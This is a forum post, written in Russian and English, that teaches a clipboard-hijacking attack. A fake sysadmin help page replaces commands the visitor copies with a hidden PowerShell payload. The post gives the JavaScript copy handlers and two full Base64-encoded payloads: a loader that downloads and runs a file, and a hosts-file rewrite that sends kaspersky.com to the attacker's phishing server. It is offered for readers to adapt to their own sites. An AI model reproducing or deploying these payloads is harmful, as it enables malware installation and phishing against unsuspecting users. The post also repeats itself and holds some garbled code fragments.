- Регистрация
- 18.12.2020
- Сообщения
- 1
- Розыгрыши
- 0
- Реакции
- 0
Tr0Jan не предоставил(а) никакой дополнительной информации.
Всем привет, решил написать статью, может кого-то уже посещали идеи или ранее где-то подобное упоминалось, но написана лично мной, надеюсь будет интересно!
В статье мы рассмотрим интересный способ распространения полезных нагрузок через веб, который не привлёк внимания со стороны безопасности браузера, потому что используется в легитимных целях обычно. Ну и рассмотрим две полезные нагрузки:
In the article we'll look at an interesting way to distribute payloads over the web, which has not attracted attention from browser security, because it is used for legitimate purposes usually. So let's take a look at two payloads:
****************
Всем привет, сегодня я бы хотел рассказать про один нестандартный, но тем не менее, интересный способ применения социальной инженерии и технических способностей. Приступаем, нередко пользователи Windows(да и в принципе Linux/MacOS) гуглят поиски решений возникших ошибок или настройки чего-либо, это может быть абсолютно, что угодно:
К делу
Для начала мы должны определиться, какую задачу мы будем предлагать решить, это может быть даже установка любой консольной софтины. Находите любой простой сис.админский сайт и кастомизируете, можно самим накатать или с GPT, технологии на нашей стороне в этом плане Ну а я покажу простой пример, вот нашли мы сайт, к примеру:
Example of Page for Making Phishing
Мы видим нормальное оформление, есть полезные команды, в данном контексте есть пользователю предлагается настроить базу данных, поочередно вводя команды. Есть возможность скопировать по нажатию кнопки. Это то, что нам нужно. Я покажу вам простой пример, далее вы адаптируете под свой код сайта. Вот я набросал такой же фрагмент:
Code where will be fake payload
Что здесь? Здесь на HTML кодом создаётся блок pre внутри него блок div с кнопкой button с идентификатором btn, дальше блок p внутри которого команда-приманка, которую пользователь будет пытаться скопировать.
Это наша приманка!
Event Handler for Button's Click
Здесь мы добавили обработчик событий, когда наша страница полностью прогрузится, затем мы создаём переменную, в которой будет храниться наша полезная нагрузка и потом создаём обработчик событий клика по кнопки, который записывает в буфер нашу полезную нагрузку, но также есть случай, когда пользователь сам выделит текст, и нажмёт Ctrl+C или выберет "Копировать" в контекстном меню, которое возникает, когда нажимаем правую кнопку мыши. На это мы тоже можем сделать обработчик:
Event Handler for Copy on page
Здесь мы к нашей странице привязали событие, которое прослушивает любое копирование, затем отменяет копирование, как будто ничего не было, а потом записывает в буфер нашу полезную нагрузку.
Собственно, основная часть для фишинга готова, осталось разработать полезную нагрузку, которую пользователь будет активировать. Ну думаю в формате урока мы сильно много экспериментировать не будем, давайте рассмотрим несколько вариантов, которые подойдут для PowerShell Windows.
Loader - Download & Execute.
Наша задача элементарна и имеет ряд последовательных действий:
Encoded CMD Script
Мы зашифровали, это пригодится, чтобы когда будет запускаться скрипт, то было меньше всякого содержимого, типа ссылок и подобного, что пользователь легко разберет, этот вариант тоже не самый скрытный, но уже лучше и проще передать сценарий именно в таком формате. Здесь мы указали ссылку на полезную нагрузку в переменную(для примера мы будем скачивать логотип Google из поисковой строки. Затем создал переменную, в которой мы получим рабочий стол, вы также можете скачать и в другие директории(Загрузки, Документы, AppData) и приплюсовал названия файла, как будет называться скаченный файл, вы ровно также можете назвать его payload.exe и он скачается, а затем исполнится. Затем мы вызываем функцию PowerShell, которая запускает скачивание, передавая параметрами ссылку, откуда скачивать и, указывая путь, по которому скачать и затем запускает файл.
Далее нам надо обернуть полезную нагрузку в сценарий, который будет подходить для исполнения из коандной строки.
Alert in Windows 11
Вот единственный алерт, в котором пользователя предупреждают, что вставляемый скрипт сразу исполнится, который выскакивает в Windows 11, для этого мы и набили длинную команду, можно команду пользователя поставить в конец, если хотите. Пользователь соглашается и происходит магия PowerShell !
Result of Command Execution
Как вы можете видеть, команда исполнилась успешно, картинка скачалась и затем запустилась, в боевых же условиях это может быть исполняемый файл.
Вот полная переменная для html:
Есть также альтернативный вариант. Мы можем переводить пользователя на фишинг. От этого не защищены никто, требуется написать скрипт, который будет под нужную ОС, но требуется применить СИ чтобы пользователь запустил ваш код с правами администратора. Для этого нам надо будет перезаписать в Windows файл hosts. C:/Windows/System32/drivers/etc/hosts . Я для примера сделаю так, чтобы при попытке открыть kaspersky.com открывался мой сайт, я подниму фейковый сайт на локалке, вы можете поднять любой сайт и просто вписать его IP-адрес. Поставить можно, что угодно, чтобы открылся ваш ресурс вместо каких-то конкретных сайтов.
Вот так он выглядит до изменений:
Before Changes
Нам все лишь надо добавить в конце строку с IP-адресом страницы, куда будем переводить пользователя и доменное имя сайта, с которого мы будем переводить, по такой схеме работает система DNS-серверов, мы обращаемся по домену, а получаем конечный IP-адрес. Вставим в конце строку:
Здесь наш сценарий:
Changed hosts File
Открываем и видим результат:
Result
Мы поменяли конфигурационный файл и теперь при открытии страницы касперского открывается наша страница, остальные возможности оставлю на вашу фантазию, этим трюком пользуются системные администраторы, когда хотят ограничить от ресурсов конкретных, переадресовывая на сайт, где сказано "Доступ к ресурсу ограничен".
Спасибо за прочтение! Жду ваших реакций и может быть продолжу показывать фокусы!
EN
*************************
Introduction
Hi everyone, today I would like to tell you about an unconventional but nevertheless interesting way of using social engineering and technical skills. Let's get started, it's not uncommon for Windows (and Linux/MacOS in general) users to google for solutions to errors or customization of something, it can be absolutely anything:
Start
First we have to decide what task we will propose to solve, it can even be installing any console software. Find any simple sys.admin site and customize, you can roll your own or with GPT, technology is on our side in this regard Well, I will show a simple example, here we found a site, for example:
Example of Page for Making Phishing
We see a normal layout, there are useful commands, in this context there is the user is prompted to customize the database by alternately entering commands. There is an option to copy at the click of a button. That's what we need. I will show you a simple example, then you adapt to your site code. Here I have sketched the same fragment:
Code where will be fake payload
What is here? Here on the HTML code creates a block pre inside a block div with a button button with the identifier btn, further block p inside which the command-bait, which the user will try to copy.
This is our bait!
Event Handler for Button's Click
Here we have added an event handler when our page is fully loaded, then we create a variable to store our payload and then we create a button click event handler that writes our payload to the buffer, but there is also a case where the user will select the text themselves and press Ctrl+C or select “Copy” from the context menu that appears when we right click. We can make a handler for this too:
Event Handler for Copy on page
Here we have bound an event to our page that listens for any copying, then cancels the copying as if nothing happened, and then writes our payload to the buffer.
Actually, the main part for phishing is ready, it remains to develop a payload that the user will activate. Well, I think we won't experiment too much in this tutorial format, let's look at a few options that will work for PowerShell Windows.
Loader - Download & Execute.
Our task is elementary and has a number of sequential actions:
Encoded CMD Script
We encrypted, it will be useful, so that when the script will be run, there will be less content, such as links and the like, which the user can easily understand, this option is also not the most secretive, but it is better and easier to pass the script in this format. Here we specified a link to the payload in a variable(for example we will download the Google logo from the search bar. Then we created a variable where we will get the desktop, you can also download to other directories (Downloads, Documents, AppData) and added the file name, what will be the name of the downloaded file, you can also name it payload.exe and it will download and then execute. Then we call a PowerShell function that runs the download by passing parameters to the link where to download from and by specifying the path to download from and then runs the file.
Next, we need to wrap the payload in a script that will be suitable for execution from the coand line.
Alert in Windows 11
Here is the only alert that warns the user that the script to be inserted will be executed immediately, that pops up in Windows 11, that's why we typed the long command, you can put the user's command at the end if you want. The user agrees and the PowerShell magic happens !
Result of Command Execution
As you can see the command executed successfully, the image downloaded and then ran, in combat conditions it could be an executable file.
Here is the full variable for html:
There is also an alternative option. We can transfer the user to phishing. No one is protected from this, it is required to write a script that will be under the desired OS, but it is required to apply SI to make the user run your code with administrator rights. To do this, we will need to overwrite the hosts file in Windows. C:/Windows/System32/drivers/etc/hosts . For example, when I try to open kaspersky.com my site will be opened, I will raise a fake site on local, you can raise any site and just enter its IP address. You can put anything you want, so that your resource opens instead of some specific sites.
This is what it looks like before the changes:
Before Changes
We just need to add at the end of the line with the IP-address of the page where we will translate the user and the domain name of the site from which we will translate, this is how the system of DNS-servers works, we address the domain, and get the final IP-address. Let's insert a line at the end:
Here our script:
Changed hosts File
Open and you can see result:
Result
We changed the configuration file and now when you open the Kaspersky page opens our page, the rest of the features I will leave to your imagination, this trick is used by system administrators when they want to restrict from resources specific, redirecting to a site that says “Access to the resource is restricted”.
Thanks for reading! I look forward to your reactions and maybe I'll keep showing tricks!
******
Русская версия:
Для просмотра ссылки Войдиили Зарегистрируйся
ENG version:
Для просмотра ссылки Войдиили Зарегистрируйся
В статье мы рассмотрим интересный способ распространения полезных нагрузок через веб, который не привлёк внимания со стороны безопасности браузера, потому что используется в легитимных целях обычно. Ну и рассмотрим две полезные нагрузки:
- Loader. Скачает и запустит файл
- DNS Router. При попытке перейти по какому-то домену, пользователя будет перебрасывать на наш phishing.
In the article we'll look at an interesting way to distribute payloads over the web, which has not attracted attention from browser security, because it is used for legitimate purposes usually. So let's take a look at two payloads:
- Loader. Downloads and runs the file
- DNS Router. When trying to navigate to some domain, the user will be redirected to our phishing.
****************
Всем привет, сегодня я бы хотел рассказать про один нестандартный, но тем не менее, интересный способ применения социальной инженерии и технических способностей. Приступаем, нередко пользователи Windows(да и в принципе Linux/MacOS) гуглят поиски решений возникших ошибок или настройки чего-либо, это может быть абсолютно, что угодно:
- Установка языка программирования
- Запуск скриптов
- Обновление компонентов
- Извлечение системной информации
- Отключение параметров системных(банально установка прокси)
К делу
Для начала мы должны определиться, какую задачу мы будем предлагать решить, это может быть даже установка любой консольной софтины. Находите любой простой сис.админский сайт и кастомизируете, можно самим накатать или с GPT, технологии на нашей стороне в этом плане
Example of Page for Making Phishing
Мы видим нормальное оформление, есть полезные команды, в данном контексте есть пользователю предлагается настроить базу данных, поочередно вводя команды. Есть возможность скопировать по нажатию кнопки. Это то, что нам нужно. Я покажу вам простой пример, далее вы адаптируете под свой код сайта. Вот я набросал такой же фрагмент:
Code where will be fake payload
Что здесь? Здесь на HTML кодом создаётся блок pre внутри него блок div с кнопкой button с идентификатором btn, дальше блок p внутри которого команда-приманка, которую пользователь будет пытаться скопировать.
Это наша приманка!
Event Handler for Button's Click
Здесь мы добавили обработчик событий, когда наша страница полностью прогрузится, затем мы создаём переменную, в которой будет храниться наша полезная нагрузка и потом создаём обработчик событий клика по кнопки, который записывает в буфер нашу полезную нагрузку, но также есть случай, когда пользователь сам выделит текст, и нажмёт Ctrl+C или выберет "Копировать" в контекстном меню, которое возникает, когда нажимаем правую кнопку мыши. На это мы тоже можем сделать обработчик:
Event Handler for Copy on page
Здесь мы к нашей странице привязали событие, которое прослушивает любое копирование, затем отменяет копирование, как будто ничего не было, а потом записывает в буфер нашу полезную нагрузку.
Собственно, основная часть для фишинга готова, осталось разработать полезную нагрузку, которую пользователь будет активировать. Ну думаю в формате урока мы сильно много экспериментировать не будем, давайте рассмотрим несколько вариантов, которые подойдут для PowerShell Windows.
Loader - Download & Execute.
Наша задача элементарна и имеет ряд последовательных действий:
- Создать переменные с ссылкой на скачивание и путём, куда скачется
- Скачать полезную нагрузку
- Запустить полезную нагрузку
$url = 'Для просмотра ссылки Войдиили Зарегистрируйся
$output = [System.Environment]::GetFolderPath([System.Environment+SpecialFolder]:esktop);
$output += '\file.png';
Invoke-WebRequest -Uri $url -OutFile $output
Закодируем его в Base64:Start-Process -FilePath $output
Encoded CMD Script
Мы зашифровали, это пригодится, чтобы когда будет запускаться скрипт, то было меньше всякого содержимого, типа ссылок и подобного, что пользователь легко разберет, этот вариант тоже не самый скрытный, но уже лучше и проще передать сценарий именно в таком формате. Здесь мы указали ссылку на полезную нагрузку в переменную(для примера мы будем скачивать логотип Google из поисковой строки. Затем создал переменную, в которой мы получим рабочий стол, вы также можете скачать и в другие директории(Загрузки, Документы, AppData) и приплюсовал названия файла, как будет называться скаченный файл, вы ровно также можете назвать его payload.exe и он скачается, а затем исполнится. Затем мы вызываем функцию PowerShell, которая запускает скачивание, передавая параметрами ссылку, откуда скачивать и, указывая путь, по которому скачать и затем запускает файл.
Далее нам надо обернуть полезную нагрузку в сценарий, который будет подходить для исполнения из коандной строки.
Здесь мы из командной строки запускаем PowerShell, передавая в параметр команды команду, которая присвоит переменной text нашу полезную нагрузку, раскодировав её, затем запустит PowerShell также передав в команду весь наш раскодированный сценарий. Пробуем!powershell -Command "$text = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(' ЗАКОДИРОВАННАЯ ПОЛЕЗНАЯ НАГРУЗКА ')); powershell -Command $text"
Alert in Windows 11
Вот единственный алерт, в котором пользователя предупреждают, что вставляемый скрипт сразу исполнится, который выскакивает в Windows 11, для этого мы и набили длинную команду, можно команду пользователя поставить в конец, если хотите. Пользователь соглашается и происходит магия PowerShell !
Result of Command Execution
Как вы можете видеть, команда исполнилась успешно, картинка скачалась и затем запустилась, в боевых же условиях это может быть исполняемый файл.
Вот полная переменная для html:
DNS Route - From Original Domain to Other IP-Addresslet malwareScript =mysql -u root -p\npowershell -Command "$text = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHVybCA9ICdodHRwczovL3d3dy5nb29nbGUuY29tL2ltYWdlcy9icmFuZGluZy9nb29nbGVsb2dvLzJ4L2dvb2dsZWxvZ29fY29sb3JfMjcyeDkyZHAucG5nJzsKJG91dHB1dCA9IFtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKFtTeXN0ZW0uRW52aXJvbm1lbnQrU3BlY2lhbEZvbGRlcl06OkRlc2t0b3ApOwokb3V0cHV0ICs9ICdcZmlsZS5wbmcnOwpJbnZva2UtV2ViUmVxdWVzdCAtVXJpICR1cmwgLU91dEZpbGUgJG91dHB1dApTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAkb3V0cHV0')); powershell -Command $text"\n
;
Есть также альтернативный вариант. Мы можем переводить пользователя на фишинг. От этого не защищены никто, требуется написать скрипт, который будет под нужную ОС, но требуется применить СИ чтобы пользователь запустил ваш код с правами администратора. Для этого нам надо будет перезаписать в Windows файл hosts. C:/Windows/System32/drivers/etc/hosts . Я для примера сделаю так, чтобы при попытке открыть kaspersky.com открывался мой сайт, я подниму фейковый сайт на локалке, вы можете поднять любой сайт и просто вписать его IP-адрес. Поставить можно, что угодно, чтобы открылся ваш ресурс вместо каких-то конкретных сайтов.
Вот так он выглядит до изменений:
Before Changes
Нам все лишь надо добавить в конце строку с IP-адресом страницы, куда будем переводить пользователя и доменное имя сайта, с которого мы будем переводить, по такой схеме работает система DNS-серверов, мы обращаемся по домену, а получаем конечный IP-адрес. Вставим в конце строку:
Вместо 127.0.0.1 вы укажите IP-адрес нужного сервера с вашей страницей.127.0.0.1 kaspersky.com
Здесь наш сценарий:
$ip_string = '127.0.0.1 kaspersky.com';
$system = [System.Environment]::GetFolderPath([System.Environment+SpecialFolder]::System);
$system += '\drivers\etc\hosts';
Нашли папку System32 и файл hosts, а затем в переменную подставили значение строки, которую добавим в конец. Кодируем и оборачиваем в уже ранее созданную полезную нагрузку:Add-Content -Path $system -Value $ip_string
Пробуем! Скрипт, запущенный в командной строке с правами администратора, поменял файл:let malwareScript =mysql -u root -p\npowershell -Command "$text = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGlwX3N0cmluZyA9ICcxMjcuMC4wLjEga2FzcGVyc2t5LmNvbSc7CiRzeXN0ZW0gPSBbU3lzdGVtLkVudmlyb25tZW50XTo6R2V0Rm9sZGVyUGF0aChbU3lzdGVtLkVudmlyb25tZW50K1NwZWNpYWxGb2xkZXJdOjpTeXN0ZW0pOwokc3lzdGVtICs9ICdcZHJpdmVyc1xldGNcaG9zdHMnOwpBZGQtQ29udGVudCAtUGF0aCAkc3lzdGVtIC1WYWx1ZSAkaXBfc3RyaW5n')); powershell -Command $text"\n
;
Changed hosts File
Открываем и видим результат:
Result
Мы поменяли конфигурационный файл и теперь при открытии страницы касперского открывается наша страница, остальные возможности оставлю на вашу фантазию, этим трюком пользуются системные администраторы, когда хотят ограничить от ресурсов конкретных, переадресовывая на сайт, где сказано "Доступ к ресурсу ограничен".
Спасибо за прочтение! Жду ваших реакций и может быть продолжу показывать фокусы!
EN
*************************
Introduction
Hi everyone, today I would like to tell you about an unconventional but nevertheless interesting way of using social engineering and technical skills. Let's get started, it's not uncommon for Windows (and Linux/MacOS in general) users to google for solutions to errors or customization of something, it can be absolutely anything:
- Installing a programming language
- Running scripts
- Updating components
- Retrieving system information
- Disabling system parameters (banal proxy installation)
Start
First we have to decide what task we will propose to solve, it can even be installing any console software. Find any simple sys.admin site and customize, you can roll your own or with GPT, technology is on our side in this regard
Example of Page for Making Phishing
We see a normal layout, there are useful commands, in this context there is the user is prompted to customize the database by alternately entering commands. There is an option to copy at the click of a button. That's what we need. I will show you a simple example, then you adapt to your site code. Here I have sketched the same fragment:
Code where will be fake payload
What is here? Here on the HTML code creates a block pre inside a block div with a button button with the identifier btn, further block p inside which the command-bait, which the user will try to copy.
This is our bait!
Event Handler for Button's Click
Here we have added an event handler when our page is fully loaded, then we create a variable to store our payload and then we create a button click event handler that writes our payload to the buffer, but there is also a case where the user will select the text themselves and press Ctrl+C or select “Copy” from the context menu that appears when we right click. We can make a handler for this too:
Event Handler for Copy on page
Here we have bound an event to our page that listens for any copying, then cancels the copying as if nothing happened, and then writes our payload to the buffer.
Actually, the main part for phishing is ready, it remains to develop a payload that the user will activate. Well, I think we won't experiment too much in this tutorial format, let's look at a few options that will work for PowerShell Windows.
Loader - Download & Execute.
Our task is elementary and has a number of sequential actions:
- Create variables with the download link and the path where the download will go
- Download the payload
- Run the payload
$url = 'Для просмотра ссылки Войдиили Зарегистрируйся
$output = [System.Environment]::GetFolderPath([System.Environment+SpecialFolder]:esktop);
$output += '\file.png';
Invoke-WebRequest -Uri $url -OutFile $output
Encode to Base64 string:Start-Process -FilePath $output
Encoded CMD Script
We encrypted, it will be useful, so that when the script will be run, there will be less content, such as links and the like, which the user can easily understand, this option is also not the most secretive, but it is better and easier to pass the script in this format. Here we specified a link to the payload in a variable(for example we will download the Google logo from the search bar. Then we created a variable where we will get the desktop, you can also download to other directories (Downloads, Documents, AppData) and added the file name, what will be the name of the downloaded file, you can also name it payload.exe and it will download and then execute. Then we call a PowerShell function that runs the download by passing parameters to the link where to download from and by specifying the path to download from and then runs the file.
Next, we need to wrap the payload in a script that will be suitable for execution from the coand line.
Here we run PowerShell from the command line, passing in the command parameter to the cmdlet, which will assign our payload to the text variable, decoding it, then run PowerShell also passing in our entire decoded script to the cmdlet. Let's try it!powershell -Command "$text = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(' ENCODED_TO_BASE64_PAYLOAD ')); powershell -Command $text"
Alert in Windows 11
Here is the only alert that warns the user that the script to be inserted will be executed immediately, that pops up in Windows 11, that's why we typed the long command, you can put the user's command at the end if you want. The user agrees and the PowerShell magic happens !
Result of Command Execution
As you can see the command executed successfully, the image downloaded and then ran, in combat conditions it could be an executable file.
Here is the full variable for html:
DNS Route - From Original Domain to Other IP-Addresslet malwareScript =mysql -u root -p\npowershell -Command "$text = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHVybCA9ICdodHRwczovL3d3dy5nb29nbGUuY29tL2ltYWdlcy9icmFuZGluZy9nb29nbGVsb2dvLzJ4L2dvb2dsZWxvZ29fY29sb3JfMjcyeDkyZHAucG5nJzsKJG91dHB1dCA9IFtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKFtTeXN0ZW0uRW52aXJvbm1lbnQrU3BlY2lhbEZvbGRlcl06OkRlc2t0b3ApOwokb3V0cHV0ICs9ICdcZmlsZS5wbmcnOwpJbnZva2UtV2ViUmVxdWVzdCAtVXJpICR1cmwgLU91dEZpbGUgJG91dHB1dApTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAkb3V0cHV0')); powershell -Command $text"\n
;
There is also an alternative option. We can transfer the user to phishing. No one is protected from this, it is required to write a script that will be under the desired OS, but it is required to apply SI to make the user run your code with administrator rights. To do this, we will need to overwrite the hosts file in Windows. C:/Windows/System32/drivers/etc/hosts . For example, when I try to open kaspersky.com my site will be opened, I will raise a fake site on local, you can raise any site and just enter its IP address. You can put anything you want, so that your resource opens instead of some specific sites.
This is what it looks like before the changes:
Before Changes
We just need to add at the end of the line with the IP-address of the page where we will translate the user and the domain name of the site from which we will translate, this is how the system of DNS-servers works, we address the domain, and get the final IP-address. Let's insert a line at the end:
Instead of 127.0.0.1, you will specify the IP address of the desired server with your page.127.0.0.1 kaspersky.com
Here our script:
$ip_string = '127.0.0.1 kaspersky.com';
$system = [System.Environment]::GetFolderPath([System.Environment+SpecialFolder]::System);
$system += '\drivers\etc\hosts';
Found the System32 folder and hosts file, and then substituted the value of the string we'll add to the end into a variable. We code and wrap it in the previously created payload:Add-Content -Path $system -Value $ip_string
Try it! A script run on the command line with administrator privileges changed the file:let malwareScript =mysql -u root -p\npowershell -Command "[/I]$text = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGlwX3N0cmluZyA9ICcxMjcuMC4wLjEga2FzcGVyc2t5LmNvbSc7CiRzeXN0ZW0gPSBbU3lzdGVtLkVudmlyb25tZW50XTo6R2V0Rm9sZGVyUGF0aChbU3lzdGVtLkVudmlyb25tZW50K1NwZWNpYWxGb2xkZXJdOjpTeXN0ZW0pOwokc3lzdGVtICs9ICdcZHJpdmVyc1xldGNcaG9zdHMnOwpBZGQtQ29udGVudCAtUGF0aCAkc3lzdGVtIC1WYWx1ZSAkaXBfc3RyaW5n')); powershell -Command $text[I]"\n
;
Changed hosts File
Open and you can see result:
Result
We changed the configuration file and now when you open the Kaspersky page opens our page, the rest of the features I will leave to your imagination, this trick is used by system administrators when they want to restrict from resources specific, redirecting to a site that says “Access to the resource is restricted”.
Thanks for reading! I look forward to your reactions and maybe I'll keep showing tricks!
******
Русская версия:
Для просмотра ссылки Войди
ENG version:
Для просмотра ссылки Войди